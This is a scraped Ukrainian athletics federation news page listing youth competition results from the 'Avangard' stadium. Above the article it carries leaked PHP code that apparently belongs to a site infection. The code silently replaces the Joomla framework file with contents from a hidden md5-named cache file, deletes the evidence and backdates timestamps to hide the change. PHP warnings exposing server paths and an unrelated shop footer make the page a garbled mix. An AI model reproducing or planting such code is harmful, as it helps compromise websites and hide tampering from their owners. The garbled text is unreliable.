$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 426
ЛІТНІЙ СЕЗОН РОЗПОЧАТО | ФЕДЕРАЦІЯ ЛЕГКОЇ АТЛЕТИКИ УЖГОРОДА

 

 

28 березня на стадіоні «Авангард»
відбулася Першість ДЮСШ №1

з багатоборства ( I тур).

У змаганнях прийняли участь юнаки та дівчата у трьох вікових групах : 1995-96; 1997-98; 1999 та молодші.
У перший день багатотурових змагань юні легкоатлети виборювали медалі у двох видах програми:
потрійний стрибок з місця (1999-2000 р.н. – стрибок з місця),
біг 1000 м (1999-2000 р.н. біг 600 м).
Переможці та призери:
1995-96 р.н.
потрійний стрибок з місця :
дівчата   1 місце Лакас Руслана                      6 м 79 см
              2 місце Бєлкіна Ольга                       6 м 51 см
              3 місце Таргонська Сніжана              6 м 17 см
юнаки     1 місце  Беззаботнов Владислав       8 м 34 см – рекорд  змагань (до 15 років)
              2 місце  Дилин Іван                          8 м 12 см
              3 місце  Білей Євген                         7 м 74 см
Біг 1000 м
дівчата  1 місце  Анталовці Корнелія             3.54,1 сек
             2 місце   Таргонська Сніжана           4.04,3 сек
             3 місце   Кліп Ірина                          4.09,7 сек
юнаки   1 місце   Вершинський Дієго             3.32.0 сек
             2 місце   Потураєв Михайло              3.35.2 сек
             3 місце  Чопойдало Нестор               3.42.4 сек  
1997-98 р.н.
потрійний стрибок з місця :
дівчата  1 місце  Коломоєць Аліна                6 м 82 см  - рекорд  змагань (до 12 років)
             2 місце  Новікова Дарія                   6 м 75 см  - рекорд змагань  (до 13 років)
             3 місце  Станчак Вероніка               6 м 30 см
юнаки    1 місце  Мікловцік Михайло             7 м 15 см
             2 місце  Андрейкович Віктор            6 м 61 см
             3 місце  Лукачина Василь                6 м 49 см
Біг 1000 м
дівчата   1 місце  Рахманова Лоліта               3.54.7 сек
              2 місце  Готра Яна                           4.11,5 сек
              3 місце  Орос Юля                           4.23,7 сек
юнаки     1 місце  Лукачина Василь               3.40,9 сек
              2 місце  Андрейкович Віктор           3.44,3 сек
              3 місце  Чопойдало Нестор              4.00,3 сек

1999-2000 р.н.
стрибок з місця:
дівчата   1 місце  Бурлака Марина                   186 см
              2 місце  Шоварго Олександра           176 см
              3 місце  Соболєва Надія                   157 см 
юнаки    1 місце  Матола Діма                         184 см
             2 місце  Козот Кріст                           179 см
             3 місце  Качайло Саша                      168 см
Біг 600 м:
дівчата  1 місце  Соболєва Надія                     2.30,6 сек
             2 місце  Юхно Анюта                           2.33,9 сек
             3 місце  Бурлака Марина                    2.38,4 сек
юнаки   1 місце  Гапак Олег                             2.13.2 сек
            2 місце  Качайло Саша                        2.13.4 сек
            3 місце  Воленюк Деніс                        2.24,0 сек  

Наступні 2 вида – біг 300 м та метання м’яча відбудуться  17 квітня.

 

 
ГОЛОВНА НОВИНИ новини ЛІТНІЙ СЕЗОН РОЗПОЧАТО
'Flauz' интернет магазин спортивного питания